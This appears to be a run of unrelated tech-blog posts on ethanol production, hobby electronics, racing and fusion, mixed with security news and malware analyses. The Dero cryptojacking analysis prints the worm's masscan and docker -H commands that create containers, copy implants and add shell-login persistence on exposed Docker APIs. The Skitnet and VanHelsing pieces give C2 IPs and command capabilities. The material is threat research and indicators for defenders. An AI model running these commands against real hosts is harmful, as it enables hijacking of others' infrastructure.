Though that story may be somewhat apocryphal, at least one of those threads is still woven into the American story. The moonshiner’s hotrod morphed into NASCAR, one of the nation’s most-watched spectator sports, and informed much of the car culture of the 20th century in general. Unfortunately, that led in part to our current fossil fuel predicament and its attendant environmental consequences, which are now being addressed by replacing at least some of the gasoline we burn with the same “white lightning” those old moonshiners made. The cost-benefit analysis of ethanol as a fuel is open to debate, as is the wisdom of using food for motor fuel, but one thing’s for sure: turning corn into ethanol in industrially useful quantities isn’t easy, and it requires some Big Chemistry to get it done.
Heavy on the Starch
As with fossil fuels, manufacturing ethanol for motor fuel starts with a steady supply of an appropriate feedstock. But unlike the drilling rigs and pump jacks that pull the geochemically modified remains of half-billion-year-old phytoplankton from deep within the Earth, ethanol’s feedstock is almost entirely harvested from the vast swathes of corn that carpet the Midwest US. (Other grains and even non-grain plants are used as feedstock in other parts of the world, but we’re going to stick with corn for this discussion. Also, other parts of the world refer to any grain crop as corn, but in this case, corn refers specifically to maize.)
Don’t try to eat it — you’ll break your teeth. Yellow dent corn is harvested when full of starch and hard as a rock. Credit: Marjhan Ramboyong.
The corn used for ethanol production is not the same as the corn-on-the-cob at a summer barbecue or that comes in plastic bags of frozen Niblets. Those products use sweet corn bred specifically to pack extra simple sugars and less starch into their kernels, which is harvested while the corn plant is still alive and the kernels are still tender. Field corn, on the other hand, is bred to produce as much starch as possible, and is left in the field until the stalks are dead and the kernels have converted almost all of their sugar into starch. This leaves the kernels dry and hard as a rock, and often with a dimple in their top face that gives them their other name, dent corn.
Each kernel of corn is a fruit, at least botanically, with all the genetic information needed to create a new corn plant. That’s carried in the germ of the kernel, a relatively small part of the kernel that contains the embryo, a bit of oil, and some enzymes. The bulk of the kernel is taken up by the endosperm, the energy reserve used by the embryo to germinate, and as a food source until photosynthesis kicks in. That energy reserve is mainly composed of starch, which will power the fermentation process to come.
Starch is mainly composed of two different but related polysaccharides, amylose and amylopectin. Both are polymers of the simple six-carbon sugar glucose, but with slightly different arrangements. Amylose is composed of long, straight chains of glucose molecules bound together in what’s called an α-1,4 glycosidic bond, which just means that the hydroxyl group on the first carbon of the first glucose is bound to the hydroxyl on the fourth carbon of the second glucose through an oxygen atom:
Amylose, one of the main polysaccharides in starch. The glucose subunits are connected in long, unbranched chains up to 500 or so residues long. The oxygen atom binding each glucose together comes from a reaction between the OH radicals on the 1 and 4 carbons, with one oxygen and two hydrogens leaving in the form of water.
Amylose chains can be up to about 500 or so glucose subunits long. Amylopectin, on the other hand, has shorter straight chains but also branches formed between the number one and number six carbon, an α-1,6 glycosidic bond. The branches appear about every 25 residues or so, making amylopectin much more tangled and complex than amylose. Amylopectin makes up about 75% of the starch in a kernel.
Slurry Time
Ethanol production begins with harvesting corn using combine harvesters. These massive machines cut down dozens of rows of corn at a time, separating the ears from the stalks and feeding them into a threshing drum, where the kernels are freed from the cob. Winnowing fans and sieves separate the chaff and debris from the kernels, which are stored in a tank onboard the combine until they can be transferred to a grain truck for transport to a grain bin for storage and further drying.
Corn harvest in progress. You’ve got to burn a lot of diesel to make ethanol. Credit: dvande – stock.adobe.com
Once the corn is properly dried, open-top hopper trucks or train cars transport it to the distillery. The first stop is the scale house, where the cargo is weighed and a small sample of grain is taken from deep within the hopper by a remote-controlled vacuum arm. The sample is transported directly to the scale house for a quick quality assessment, mainly based on moisture content but also the physical state of the kernels. Loads that are too wet, too dirty, or have too many fractured kernels are rejected.
Loads that pass QC are dumped through gates at the bottom of the hoppers into a pit that connects to storage silos via a series of augers and conveyors. Most ethanol plants keep a substantial stock of corn, enough to run the plant for several days in case of any supply disruption. Ethanol plants operate mainly in batch mode, with each batch taking several days to complete, so a large stock ensures the efficiency of continuous operation.
The Lakota Green Plains ethanol plant in Iowa. Ethanol plants look a lot like small petroleum refineries and share some of the same equipment. Source: MsEuphonic, CC BY-SA 3.0.
To start a batch of ethanol, corn kernels need to be milled into a fine flour. Corn is fed to a hammer mill, where large steel weights swinging on a flywheel smash the tough pericarp that protects the endosperm and the germ. The starch granules are also smashed to bits, exposing as much surface area as possible. The milled corn is then mixed with clean water to form a slurry, which can be pumped around the plant easily.
The first stop for the slurry is large cooking vats, which use steam to gently heat the mixture and break the starch into smaller chains. The heat also gelatinizes the starch, in a process that’s similar to what happens when a sauce is thickened with a corn starch slurry in the kitchen. The gelatinized starch undergoes liquefaction under heat and mildly acidic conditions, maintained by injecting sulfuric acid or ammonia as needed. These conditions begin hydrolysis of some of the α-1,4 glycosidic bonds, breaking the amylose and amylopectin chains down into shorter fragments called dextrin. An enzyme, α-amylase, is also added at this point to catalyze the cleavage of α-1,4 bonds, creating free glucose monomers. The α-1,6 bonds are cleaved by another enzyme, α-amyloglucosidase.
The Yeast Get Busy
The result of all this chemical and enzymatic action is a glucose-rich mixture ready for fermentation. The slurry is pumped to large reactor vessels where a combination of yeasts is added. Saccharomyces cerevisiae, or brewer’s yeast, is the most common, but other organisms can be used too. The culture is supplemented with ammonium sulfate or urea to provide the nitrogen the growing yeast requires, along with antibiotics to prevent bacterial overgrowth of the culture.
Fermentation occurs at around 30 degrees C over two to three days, while the yeast gorge themselves on the glucose-rich slurry. The glucose is transported into the yeast, where each glucose molecule is enzymatically split into two three-carbon pyruvate molecules. The pyruvates are then broken down into two molecules of acetaldehyde and two of CO2. The two acetaldehyde molecules then undergo a reduction reaction that creates two ethanol molecules. The yeast benefits from all this work by converting two molecules of ADP into two molecules of ATP, which captures the chemical energy in the glucose molecule into a form that can be used to power its metabolic processes, including making more yeast to take advantage of the bounty of glucose.
Anaerobic fermentation of one mole of glucose yields two moles of ethanol and two moles of CO2.
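For scale, the stoichiometry puts a hard ceiling on the yield of roughly half a kilogram of ethanol per kilogram of glucose, with the rest leaving as carbon dioxide:

```latex
\mathrm{C_6H_{12}O_6 \;\longrightarrow\; 2\,C_2H_5OH + 2\,CO_2},
\qquad
\frac{2 \times 46\ \mathrm{g\ ethanol}}{180\ \mathrm{g\ glucose}} \approx 51\%\ \text{by mass (theoretical)}
```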
After the population of yeast grows to the point where they use up all the glucose, the mix in the reactors, which contains about 12-15% ethanol and is referred to as beer, is pumped into a series of three distillation towers. The beer is carefully heated to the boiling point of ethanol, 78 °C. The ethanol vapors rise through the tower to a condenser, where they change back into the liquid phase and trickle down into collecting trays lining the tower. The liquid distillate is piped to the next two towers, where the same process occurs and the distillate becomes increasingly pure. At the end of the final distillation, the mixture is about 95% pure ethanol, or 190 proof. That’s the limit of purity for fractional distillation, thanks to the tendency of water and ethanol to form an azeotrope, a mixture of two or more liquids that boils at a constant temperature. To drive off the rest of the water, the distillate is pumped into large tanks containing zeolite, a molecular sieve. The zeolite beads have pores large enough to admit water molecules, but too small to admit ethanol. The water partitions into the zeolite, leaving 99% to 100% pure (198 to 200 proof) ethanol behind. The ethanol is mixed with a denaturant, usually 5% gasoline, to make it undrinkable, and pumped into storage tanks to await shipping.
Nothing Goes to Waste
The muck at the bottom of the distillation towers, referred to as whole stillage, still has a lot of valuable material and does not go to waste. The liquid is first pumped into centrifuges to separate the remaining grain solids from the liquid. The solids, called wet distiller’s grain or WDG, go to a rotary dryer, where hot air drives off most of the remaining moisture. The final product is dried distiller’s grain with solubles, or DDGS, a high-protein product used to enrich animal feed. The liquid phase from the centrifuge is called thin stillage, which contains the valuable corn oil from the germ. That’s recovered and sold as an animal feed additive, too.
Ethanol fermentation produces mountains of DDGS, or dried distiller’s grain solubles. This valuable byproduct can account for 20% of an ethanol plant’s income. Source: Inside an Ethanol Plant (YouTube).
The final valuable product that’s recovered is the carbon dioxide. Fermentation produces a lot of CO2, about 17 pounds per bushel of feedstock. The gas is tapped off the tops of the fermentation vessels by CO2 scrubbers and run through a series of compressors and coolers, which turn it into liquid carbon dioxide. This is sold off by the tanker-full to chemical companies, food and beverage manufacturers, who use it to carbonate soft drinks, and municipal water treatment plants, where it’s used to balance the pH of wastewater.
There are currently 187 fuel ethanol plants in the United States, most of which are located in the Midwest’s corn belt, for obvious reasons. Together, these plants produced more than 16 billion gallons of ethanol in 2024. Since each bushel of corn yields about 3 gallons of ethanol, that translates to an astonishing 5 billion bushels of corn used for fuel production, or about a third of the total US corn production.
VanHelsing Ransomware: Leaked Source Code Reveals Unsettling Secrets
The source code for the affiliate panel of the VanHelsing RaaS (ransomware-as-a-service) operation has been made public. Not long before, a former developer had tried to sell the source code on the RAMP hacking forum.
The VanHelsing ransomware launched in March 2025, with its creators claiming it could attack systems based on Windows, Linux, BSD, ARM, and ESXi. According to Ransomware.live, at least eight victims have fallen prey to its attacks since then.
Earlier this week, someone using the nickname th30c0der tried to sell the source code for VanHelsing’s panel and affiliate sites, along with ransomware builds for Windows and Linux, on the dark web. The price was to be set at auction, with an opening bid of $10,000.
“Selling vanhelsing ransomware source code: TOR keys included + web admin panel + chat + file server + blog, all databases included,” th30c0der wrote on the RAMP hacking forum.
According to cybersecurity researcher Emanuele De Lucia, the VanHelsing operators decided to get ahead of the seller and published the ransomware’s source code themselves. They also claimed that th30c0der is one of their former malware developers who is trying to scam people by selling old source code.
“Today we are announcing that we are publishing the old source code, and we will soon release a new and improved version of the locker (VanHelsing 2.0),” the VanHelsing operators wrote on RAMP.
In response, th30c0der claimed that his material is more complete, since the VanHelsing developers published neither the Linux builder nor any of the databases, which could be especially useful to law enforcement and security researchers.
Journalists at Bleeping Computer examined the published source code and confirmed that it contains a genuine builder for the Windows version of the malware, as well as the source code for the affiliate panel and the data leak site.
According to the researchers, the builder’s source code is a mess, with Visual Studio files sitting in the Release folder, which is normally used to store compiled binaries and build artifacts.
They also note that using the VanHelsing builder takes some extra work, since it connects to the affiliate panel at 31.222.238[.]208 to fetch data. Given that the dump contains the source code of the panel hosting the api.php endpoint, attackers can modify the code or run their own copy of the panel to make the builder work.
The published archive also contains the source code of the Windows ransomware itself, which can be used to build a standalone locker, a decryptor, and a loader.
Among other things, the publication notes that the attackers apparently attempted to create an MBR locker that would replace the master boot record with a custom bootloader displaying a lock message.
The article “VanHelsing Ransomware: Leaked Source Code Reveals Unsettling Secrets” originally appeared on il blog della sicurezza informatica.
A Look Inside a Lemon of a Race Car
Automotive racing is a grueling endeavor, a test of one’s mental and physical prowess to push an engineered masterpiece to its limit. This is all the more true of 24 hour endurance races, where teams tag-team to get the most laps of a circuit over a 24 hour period. The format pushes cars and drivers to the very limit. Doing so on a $500 budget, as presented by the 24 Hours of Lemons, makes this all the more impressive!
Of course, racing on a $500 budget is difficult to say the least. All the expected Fédération Internationale de l’Automobile (FIA) safety requirements are still in place, including roll cage, seats and fire extinguisher. However, brakes, wheels, tires and safety equipment are not factored into the cost of the car, which is good because an FIA racing seat can run well in excess of the budget. Despite the name, most races are twelve to sixteen hours across two days, but 24 hour endurance races are run. The very limiting budget and amateur nature of the event has created a large amount of room for teams to get creative with car restorations and race car builds.
The 24 Hours of Le-MINES Team and their 1990 Miata
One such team we had the chance of speaking to goes by the name 24 Hours of Le-Mines. Their build is a wonderful mishmash of custom fabrication and affordable parts. It’s built from a restored 1990 NA Miata, complete with rusted frame and all! Power is handled by a rebuilt 302 Mustang engine of indeterminate age.
The stock Miata brakes seem rather small for a race car, but are plenty for a car of its weight. Suspension is an Amazon special because it only has to work for 24 hours. The boot lid (or trunk lid, if you prefer) is held down with what look to be over-sized RC car pins. Nestled next to the PVC inlet pipe is a nitrous oxide canister — we don’t know if it’s functional or for show, but we like it nonetheless. The scrappy look is completed with a portion of a road sign fabricated into a shifter cover.
The team is unsure if the car will end up racing, but odds are that if you are reading Hackaday, you care more about the race cars than the actual racing. Regardless, we hope to see this Miata in the future!
This is certainly not the first time we have covered 24 hour endurance engineering, like this solar powered endurance plane.
Dero miner zombies biting through Docker APIs to build a cryptojacking horde
Introduction
Imagine a container zombie outbreak where a single infected container scans the internet for an exposed Docker API and bites (read: exploits) it by creating new malicious containers and compromising the running ones, thus transforming them into new “zombies” that will mine for Dero currency and continue “biting” new victims. No command-and-control server is required for the delivery, just an exponentially growing number of victims that are automatically infecting new ones. That’s exactly what the new Dero mining campaign does.
During a recent compromise assessment project, we detected a number of running containers with malicious activities. Some of the containers were previously recognized, while others were not. After forensically analyzing the containers, we confirmed that a threat actor was able to gain initial access to a running containerized infrastructure by exploiting an insecurely published Docker API. This led to the running containers being compromised and new ones being created not only to hijack the victim’s resources for cryptocurrency mining but also to launch external attacks to propagate to other networks. The diagram below describes the attack vector:
The entire attack vector is automated via two malware implants: the previously unknown propagation malware nginx and the Dero crypto miner. Both samples are written in Golang and packed with UPX. Kaspersky products detect these malicious implants with the following verdicts:
- nginx: Trojan.Linux.Agent.gen;
- Dero crypto miner: RiskTool.Linux.Miner.gen.
nginx: the propagation malware
This malware is responsible for maintaining the persistence of the crypto miner and its further propagation to external systems. This implant is designed to minimize interaction with the operator and does not require a delivery C2 server. nginx ensures that the malware spreads as long as there are users insecurely publishing their Docker APIs on the internet.
The malware is named “nginx” to masquerade as the well-known legitimate nginx web server software in an attempt to evade detection by users and security tools. In this post, we’ll refer to this malware as “nginx”.
After unpacking the nginx
malware, we parsed the metadata of the Go binary and were able to determine the location of the Go source code file at compilation time: “/root/shuju/docker2375/nginx.go”.
Infecting the container
The malware starts by creating a log file at “/var/log/nginx.log”.
This log file will be used later to log the running activities of the malware, including data like the list of infected machines, the names of created malicious containers on those machines, and the exit status code if there were any errors.
After that, in a new process, a function called main.checkVersion loops infinitely to make sure that the content of a file located at “/usr/bin/version.dat” inside the compromised container always equals 1.4. If the file contents were changed, this function overwrites them.
Ensuring that version.dat exists and contains 1.4
If version.dat doesn’t exist, the malicious function creates this file with the content 1.4, then sleeps for 24 hours before the next iteration.
Creating version.dat if it doesn’t exist
The malware uses the version.dat file to identify already infected containers, as we’ll describe later.
The nginx sample then executes the main.monitorCloudProcess function, which loops infinitely in a new process, making sure that a process named cloud, which is the Dero miner, is running. First, the malware checks whether or not the cloud process is running. If it’s not, nginx executes the main.startCloudProcess function to launch the miner.
Monitoring and executing the cloud process
In order to execute the miner, the main.startCloudProcess function attempts to locate it at “/usr/bin/cloud”.
Spreading the infection
Host search
Next, the nginx malware goes into an infinite loop of generating random IPv4 /16 network subnets with the main.generateRandomSubnet function, scanning them in order to compromise more networks.
Infinite loop of network subnets generation and scanning
The subnets with the respective IP ranges are passed to the main.scanSubnet function to be scanned via masscan, a port scanning tool installed in the container by the malware, which we will describe in more detail later. The scanner looks for an insecure Docker API published on the internet by scanning the generated subnet via the following command: masscan <subnet> -p 2375 -oL - --max-rate 360.
Scanning the generated subnet via masscan
The output of masscan is parsed via regex to extract the IPv4 addresses that have the default Docker API port 2375 open. The extracted IPv4s are then passed to the main.checkDockerDaemon function. It checks if the remote dockerd daemon on the host with a matching IPv4 is running and responsive. To do this, the malware attempts to list all running containers on the remote host by executing a docker -H <IP> ps command. If it fails, nginx proceeds to check the next IPv4.
Remotely listing running containers
Container creation
After confirming that the remote dockerd daemon is running and responsive, nginx generates a container name of 12 random characters and uses it to create a malicious container on the remote target.
The malicious container is created with docker -H <IP> run -dt --name <container_name> --restart always ubuntu:18.04 /bin/bash. The malware uses the --restart always flag to start the newly created containers automatically when they exit.
Malicious container created on a new host
Then nginx prepares the new container for the later installation of dependencies by updating the packages via docker -H <IP> exec <container_name> apt-get -yq update.
Next, the malicious sample uses a docker -H <IP> exec <container_name> apt-get install -yq masscan docker.io command to install masscan and docker.io in the container, which are dependencies for the malware to interact with the Docker daemon and to perform the external scan to infect other networks.
Remotely installing the malware dependencies inside the newly created container
Then it transfers the two malicious implants, nginx and cloud, to the container by executing docker -H <IP> cp -L /usr/bin/<implant> <container_name>:/usr/bin.
Transferring nginx and cloud to the newly created container
The malware maintains persistence by adding the transferred nginx binary to /root/.bash_aliases to make sure that it will automatically execute upon shell login. This is done via a docker -H <IP> exec <container_name> bash --norc -c 'echo "/usr/bin/nginx &" > /root/.bash_aliases' command.
Adding the nginx malware to .bash_aliases for persistence
Compromising running containers
Up until this point, the malware has only created new malicious containers. Now, it will try to compromise running ubuntu:18.04-based containers. The sample first executes the main.checkAndOperateContainers function to check all the running containers on the remote vulnerable host against two conditions: the container is based on ubuntu:18.04, and it does not contain a version.dat file, whose presence indicates that the container has already been infected.
Listing and compromising existing containers on the remote target
If these conditions are satisfied, the malware executes the main.operateOnContainer function to proceed with the same attack vector described earlier and infect the running container. The infection chain then repeats, hijacking the container's resources to scan for and compromise more containers and to mine the Dero cryptocurrency.
That way, the malware does not require a C2 connection and also maintains its activity as long as there is an insecurely published Docker API that can be exploited to compromise running containers and create new ones.
cloud – the Dero miner
Executing and maintaining cloud, the crypto miner, is the primary goal of the nginx sample. The miner is also written in Golang and packed with UPX. After unpacking the binary, we were able to attribute it to the open-source DeroHE CLI miner project found on GitHub. The threat actor wrapped the DeroHE CLI miner into the cloud malware with a hardcoded mining configuration: a wallet address and a DeroHE node (derod) address.
If no addresses are passed as arguments, which is the case in this campaign, the cloud malware uses the hardcoded encrypted configuration as the default. It is stored as a Base64-encoded string that, after decoding, results in an AES-CTR encrypted blob containing a Base64-encoded wallet address, which is decrypted with the main.decrypt function. The configuration encryption indicates that the threat actors are trying to make the malware more sophisticated, as we haven’t seen this in previous campaigns.
Decrypting the crypto wallet address
Upon decoding this string, we uncovered the wallet address in clear text: dero1qyy8xjrdjcn2dvr6pwe40jrl3evv9vam6tpx537vux60xxkx6hs7zqgde993y.
Behavioral analysis of the decryption function
Then the malware decrypts another two hardcoded AES-CTR encrypted strings to get the Dero node addresses via a function named main.sockz.
Function calls to decrypt the addresses
The node addresses are encrypted the same way the wallet address is, but with different keys. After decryption, we were able to obtain the following addresses: d.windowsupdatesupport[.]link and h.wiNdowsupdatesupport[.]link.
The same wallet address and derod node addresses had been observed before in a campaign that targeted Kubernetes clusters with Kubernetes API anonymous authentication enabled. Instead of transferring the malware to a compromised container, the threat actor pulled a malicious image named pauseyyf/pause:latest, which is published on Docker Hub and contains the miner. This image was used to create the malicious container. Unlike the current campaign, that attack vector was meant to be stealthy, as the threat actors didn’t attempt to move laterally or scan the internet to compromise more networks. These attacks were seen throughout 2023 and 2024 with minor changes in techniques.
Takeaways
Although attacks on containers are less frequent than on other systems, they are no less dangerous. In the case we analyzed, containerized environments were compromised through a combination of a previously known miner and a new sample that created malicious containers and infected existing ones. The two malicious implants spread without a C2 server, making any network with containerized infrastructure and a Docker API insecurely published to the internet a potential target.
A Shodan search shows that in April 2025 there were 520 Docker APIs published over port 2375 worldwide. This highlights the potentially destructive consequences of the described threat and emphasizes the need for thorough monitoring and container protection.
Docker APIs published over port 2375 worldwide, January–April 2025
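If you operate Docker hosts yourself, a quick way to check whether one of them answers on the unauthenticated API is to query the engine's /version endpoint from any machine with PowerShell installed. A minimal sketch, where the host address is a placeholder you would replace with one of your own systems:
# Check whether a Docker Engine API answers unauthenticated on the default plaintext port 2375.
$dockerHost = "203.0.113.10"   # placeholder address: test only hosts you own
try {
    $info = Invoke-RestMethod -Uri "http://${dockerHost}:2375/version" -TimeoutSec 5
    Write-Warning "Exposed Docker API on ${dockerHost}: engine version $($info.Version). Close port 2375 or put it behind TLS and authentication."
} catch {
    Write-Output "No unauthenticated Docker API reachable on ${dockerHost}:2375."
}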
Building your containerized infrastructure from known legitimate images alone doesn’t guarantee security. Just like any other system, containerized applications can be compromised at runtime, so it’s crucial to monitor your containerized infrastructure with efficient monitoring tools like Kaspersky Container Security. It detects misconfigurations and monitors registry images, ensuring the safety of container environments. We also recommend proactively hunting for threats to detect stealthy malicious activities and incidents that might have gone unnoticed on your network. The Kaspersky Compromise Assessment service can help you not only detect such incidents, but also remediate them and provide immediate and effective incident response.
Indicators of compromise
File hashes
094085675570A18A9225399438471CC9 nginx
14E7FB298049A57222254EF0F47464A7 cloud
File paths
NOTE: Certain file path IoCs may lead to false positives due to the masquerading technique used.
/usr/bin/nginx
/usr/bin/cloud
/var/log/nginx.log
/usr/bin/version.dat
Derod node addresses
d.windowsupdatesupport[.]link
h.wiNdowsupdatesupport[.]link
Dero wallet address
dero1qyy8xjrdjcn2dvr6pwe40jrl3evv9vam6tpx537vux60xxkx6hs7zqgde993y
Fault Analysis of a 120W Anker GaNPrime Charger
Taking a break from his usual prodding at suspicious AliExpress USB chargers, [DiodeGoneWild] recently had a gander at what used to be a good USB charger.
The Anker 737 USB charger prior to its autopsy.
Before it went completely dead, the Anker 737 GaNPrime USB charger which a viewer sent him was capable of up to 120 Watts combined across its two USB-C and one USB-A outputs. Naturally the charger’s enclosure couldn’t be opened non-destructively, and it turned out to have (soft) potting compound filling up the voids, making it a treat to diagnose. Suffice it to say that these devices are not designed to be repaired.
Since this was an autopsy, the unit was broken down into its individual PCBs, and a short was detected that was eventually traced to an IC marked ‘SW3536’, one of the ICs that communicates with the connected USB device to negotiate the voltage. That one shorted IC appears to have turned the entire charger into an expensive paperweight.
Since the charger was already in pieces, the rest of the circuit and its ICs were also analyzed. Here the gallium nitride (GaN) part was found in the Navitas GaNFast NV6136A FET with integrated gate driver, along with an Infineon CoolGaN IGI60F1414A1L integrated power stage. Unfortunately all of the cool technology was rendered useless by one component developing a short, even if it made for a fascinating look inside one of these very chonky USB chargers.
youtube.com/embed/-JV5VGO55-I?…
Skitnet: The Malware Taking Over the Ransomware World
Experts have sounded the alarm: ransomware groups are increasingly using the new Skitnet malware (also known as Bossnet) for post-exploitation of compromised networks.
According to Prodaft analysts, the malware has been advertised on hacking forums since April 2024 and started gaining popularity among extortion groups in early 2025. For example, Skitnet has already been used in attacks by BlackBasta and Cactus operators.
A Skitnet infection begins with the execution of a Rust-written loader on the target machine, which decrypts the ChaCha20-encrypted Nim binary and loads it into memory. The Nim payload creates a DNS-based reverse shell to communicate with the C&C server, initiating the session with randomized DNS queries.
The malware then starts three threads: one to send DNS beacon requests, one to monitor and extract shell output, and one to listen for and decrypt commands from DNS responses.
Messages and commands to execute are sent via HTTP or DNS, depending on the commands issued through the Skitnet control panel. From this panel the operator can view the target's IP address, location, and status, and send commands for execution.
The malware supports the following commands:
- Start: establishes persistence by downloading three files (including a malicious DLL) and creating a shortcut to the legitimate ASUS executable (ISP.exe) in the startup folder. This triggers a DLL hijack that runs the pas.ps1 PowerShell script to communicate continuously with the C&C server;
- Screen: captures a screenshot of the victim's desktop via PowerShell, uploads it to Imgur, and then sends the image URL to the C&C server;
- Anydesk: silently downloads and installs the AnyDesk remote access tool, hiding its window and taskbar icon;
- Rutserv: silently downloads and installs the RUT-Serv remote access tool;
- Shell: runs a PowerShell command loop. It sends an initial “Shell running…” message, then polls the server every 5 seconds for new commands, which are executed using Invoke-Expression, and the results are sent back;
- Av: lists the antivirus and security software installed on the machine via WMI queries (SELECT * FROM AntiVirusProduct in the root\SecurityCenter2 namespace). The results are sent to the control server.
Beyond these commands, Skitnet operators can leverage the capabilities of the .NET loader, which allows PowerShell scripts to be executed in memory to further customize attacks.
Experts point out that while extortion groups often use their own tools, tailored to specific operations and hard for antivirus software to detect, developing them is not cheap and requires skilled developers who are not always available.
Using off-the-shelf malware like Skitnet is cheaper, allows faster deployment, and makes attribution harder, because the same malware is used by many different attackers.
Prodaft researchers have published indicators of compromise for Skitnet on GitHub.
C2 servers
github.com/prodaft/malware-ioc…
109.120.179.170
178.236.247.7
181.174.164.47
181.174.164.41
181.174.164.4
181.174.164.240
181.174.164.2
181.174.164.180
181.174.164.140
181.174.164.107
181.174.164.238
The article "Skitnet: The Malware Taking Over the Ransomware World" originally appeared on il blog della sicurezza informatica.
The Mouse Language, Running on Arduino
Although plenty of us have our preferred language for coding, whether it’s C for its hardware access, Python for its usability, or Fortran for its mathematical prowess, not every language is specifically built for problem solving of a particular nature. Some are built as thought experiments or challenges, like Whitespace or Chicken, but aren’t used for serious programming. There are a few languages that fit in the gray area between these extremes, and one example is the language MOUSE, which can now be run on an Arduino.
Although MOUSE was originally meant to be a minimalist language for computers of the late 70s and early 80s with limited memory (even for the era), its syntax looks more like that of a modern esoteric language, and it would arguably take a Python developer a similar amount of time to get used to it. It’s stack-based, for a start, and also uses Reverse Polish notation for performing operations. The major difference, though, is that programs process single letters at a time, with each letter corresponding to a specific instruction. There have been some changes in the computing world since the 80s, so [Ivan]’s version of MOUSE includes a few changes that make it slightly different from the original language, but in the end he fits an interpreter, a line editor, graphics primitives, and peripheral drivers into just 2 KB of SRAM and 32 KB of Flash, so it can run on an ATmega328P.
There are some other features here as well, including support for PS/2 devices, video output, and the ability to save programs to the internal EEPROM. It’s an impressive setup for a language that doesn’t get much attention at all, but certainly one that threads the needle between usefulness and being interesting in its own right. Of course, if a language where “Hello world” is human-readable is not esoteric enough, there are others that may offer more of a challenge.
Plugging Plasma Leaks in Magnetic Confinement With New Guiding Center Model
Although the idea of containing a plasma within a magnetic field seems straightforward at first, plasmas are highly dynamic systems that will happily escape magnetic confinement if given half a chance. This poses a major problem in nuclear fusion reactors and similar, where escaping particles like alpha (helium) particles from the magnetic containment will erode the reactor wall, among other issues. For stellarators in particular the plasma dynamics are calculated as precisely as possible so that the magnetic field works with rather than against the plasma motion, with so far pretty good results.
Now researchers at the University of Texas reckon that they can improve on these plasma system calculations with a new, more precise and efficient method. Their suggested non-perturbative guiding center model is published in (paywalled) Physical Review Letters, with a preprint available on arXiv.
The current perturbative guiding center model admittedly works well enough that even the article authors admit to e.g. Wendelstein 7-X being within a few percent of perfectly optimized. While we wouldn’t dare to take a poke at what exactly this ‘data-driven symmetry theory’ approach does differently, it suggests the use of machine learning based on simulation data, which then presumably does a better job at describing the movement of alpha particles through the magnetic field than traditional simulations.
Top image: Interior of the Wendelstein 7-X stellarator during maintenance.
Working On Open-Source High-Speed Ethernet Switch
Our hacker [Andrew Zonenberg] reports in on his open-source high-speed Ethernet switch. He hasn’t finished yet, but progress has been made.
If you were wondering what might be involved in a high-speed Ethernet switch implementation, look no further. He’s been working on this project, on and off, since 2012. His design now includes a dizzying array of parts. [Andrew] managed to snag some XCKU5P FPGAs for cheap, paying two cents on the dollar, and having access to this fairly high-powered hardware affected the project’s direction.
You might be familiar with [Andrew Zonenberg] as we have heard from him before. He’s the guy who gave us the glscopeclient, which is now ngscopeclient.
As perhaps you know, when he says in his report that he is an “experienced RTL engineer”, he is talking about Register-Transfer Level, which is an abstraction layer used by hardware description languages, such as Verilog and VHDL, which are used to program FPGAs. When he says “RTL” he’s not talking about Resistor-Transistor Logic (an ancient method of developing digital hardware) or the equally ancient line of Realtek Ethernet controllers such as the RTL8139.
When it comes to open-source software you can usually get a copy at no cost. With open-source hardware, on the other hand, you might find yourself needing to fork out for some very expensive bits of kit. High speed is still expensive! And… proprietary, for now. If you’re looking to implement Ethernet hardware today, you will have to stick with something slower. Otherwise, stay tuned, and watch this space.
Stylus Synth Should Have Used a 555– and Did!
For all that “should have used a 555” is a bit of a meme around here, there’s some truth to it. The humble 555 is a wonderful tool in the right hands. That’s why it’s wonderful to see this all-analog stylus synth project by EE student [DarcyJ] bringing the 555 out for the new generation.
The project is heavily inspired by the vintage stylophone, but has some neat tweaks. A capacitor bank means multiple octaves are available, and using a ladder of trim pots instead of fixed resistors makes every note tunable. [Darcy] of course included the vibrato function of the original, and yes, he used a 555 for that, too. He put a trim pot on that, too, to control the depth of vibrato, which we don’t recall seeing on the original stylophone.
The writeup is very high quality and could be recommended to anyone just getting started in analog (or analogue) electronics– not only does [Darcy] explain his design process, he also shows his pratfalls and mistakes, like in the various revisions he went through before discovering the push-pull amplifier that ultimately powers the speaker.
Each circuit is separately laid out and labeled on the PCB [Darcy] designed in KiCad for this project. Between that and everything being through-hole, it seems like [Darcy] has the makings of a lovely training kit. If you’re interested in rolling your own, the files are on GitHub under a CERN-OHL-S v2 license, and don’t forget to check out the demo video embedded below to hear it in action.
Of course, making music on the 555 is hardly a new hack. We’ve seen everything from accordions to paper-tape player pianos to squonkboxes over the years. Got another use for the 555? Let us know about it, in the inevitable shill for our tip line you all knew was coming.
youtube.com/embed/EBShBqbxInw?…
As The World Burns, At least You’ll Have Secure Messaging
There’s a section of our community who concern themselves with the technological aspects of preparing for an uncertain future, and for them a significant proportion of effort goes into communication. This has always included amateur radio, but in more recent years it has been extended to LoRa. To that end, [Bertrand Selva] has created a LoRa communicator, one which uses a Pi Pico and delivers secure messaging.
The hardware is a rather-nice looking 3D printed case with a color screen and a USB A port for a keyboard, but perhaps the way it works is more interesting. It takes a one-time pad approach to encryption, using a key the same length as the message. This means that an intercepted message is in effect undecryptable without the key, but we are curious about the keys themselves.
The keys are a generated list stored on an SD card, with a copy present in each terminal on a particular net of devices, and each key is tied to a GPS-derived time. Old keys are destroyed, but we’re interested in how the keys are generated, as well as how such a system could be made to survive the loss of one of those SD cards. We’re guessing that, just as when a Cold War spy had his one-time pad captured, that would mean game over for the security.
So if Meshtastic isn’t quite the thing for you then it’s possible that this could be an alternative. As an aside we’re interested to note that it’s using a 433 MHz LoRa module, revealing the different frequency preferences that exist between enthusiasts in different countries.
youtube.com/embed/R846vWyKoqg?…
The Make-roscope
Normal people binge-scroll social media. Hackaday writers tend to pore through online tech news and shopping sites incessantly. The problem with the shopping sites is that you wind up buying things, and then you have even more projects you don’t have time to do. That’s how I found the MAKE-roscope, an accessory aimed at kids that turns a cell phone into a microscope. While it was clearly trying to appeal to kids, I’ve had some kids’ microscopes that were actually useful, and for $20, I decided to see what it was about. If nothing else, the name made it appealing.
My goal was to see if it would be worth having for the kinds of things we do. Turns out, I should have read more closely. It isn’t really going to help you with your next PCB or to read that tiny print on an SMD part. But it is interesting, and — depending on your interests — you might enjoy having one. The material claims the scope can magnify from 125x to 400x.
What Is It?
A microscope in a tin. Just add a cell phone or tablet
